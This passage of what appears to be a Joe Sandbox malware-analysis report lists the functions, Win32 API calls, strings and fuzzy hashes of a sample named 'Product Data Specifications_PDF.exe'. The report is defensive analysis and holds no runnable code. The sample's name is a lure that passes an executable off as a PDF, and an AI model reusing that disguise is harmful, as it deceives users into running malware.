                              Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                              • _wcslen.LIBCMT ref: 00450720
                              • _wcscat.LIBCMT ref: 00450733
                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$Window_wcscat_wcslen
                              • String ID: -----$SysListView32
                              • API String ID: 4008455318-3975388722
                              • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                              • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                              • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                              • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                              Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                              • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                              • GetParent.USER32 ref: 00469C98
                              • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                              • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                              • GetParent.USER32 ref: 00469CBC
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$CtrlParent$_memmove_wcslen
                              • String ID: ComboBox$ListBox
                              • API String ID: 2360848162-1403004172
                              • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                              • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                              • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                              • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                              Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                              • String ID:
                              • API String ID: 262282135-0
                              • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                              • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                              • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                              • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                              Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                              • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                              • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow
                              • String ID:
                              • API String ID: 312131281-0
                              • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                              • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                              • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                              • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                              Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                              • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                              • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                                • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                              • String ID:
                              • API String ID: 3771399671-0
                              • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                              • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                              • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                              • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                              Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00434643
                              • GetForegroundWindow.USER32(00000000), ref: 00434655
                              • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                              • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                              • String ID:
                              • API String ID: 2156557900-0
                              • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                              • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                              • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                              • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                              Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                              • API String ID: 0-1603158881
                              • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                              • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                              • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                              • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                              Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                              Download Yara Rule
                              APIs
                              • CreateMenu.USER32 ref: 00448603
                              • SetMenu.USER32(?,00000000), ref: 00448613
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                              • IsMenu.USER32(?), ref: 004486AB
                              • CreatePopupMenu.USER32 ref: 004486B5
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                              • DrawMenuBar.USER32 ref: 004486F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                              • String ID: 0
                              • API String ID: 161812096-4108050209
                              • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                              • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                              • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                              • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                              Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Product Data Specifications_PDF.exe), ref: 00434057
                              • LoadStringW.USER32(00000000), ref: 00434060
                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                              • LoadStringW.USER32(00000000), ref: 00434078
                              • _wprintf.LIBCMT ref: 004340A1
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                              Strings
                              • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                              • C:\Users\user\Desktop\Product Data Specifications_PDF.exe, xrefs: 00434040
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString$Message_wprintf
                              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                              • API String ID: 3648134473-1500177932
                              • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                              • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                              • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                              • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                              Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a2498e882bfae39c3afa9084c8f54e08e1e98e57ddebf6092a9f935a5e62d1db
                              • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                              • Opcode Fuzzy Hash: a2498e882bfae39c3afa9084c8f54e08e1e98e57ddebf6092a9f935a5e62d1db
                              • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                              Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                              • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                              • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                              • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                              Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,0040F545,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,004A90E8,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                              • MoveFileW.KERNEL32(?,?), ref: 00453932
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                              • String ID:
                              • API String ID: 978794511-0
                              • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                              • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                              • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                              • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                              Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                              • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                              • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                              • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                              Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                              • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                              • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                              • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                              Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove$_memcmp
                              • String ID: '$\$h
                              • API String ID: 2205784470-1303700344
                              • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                              • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
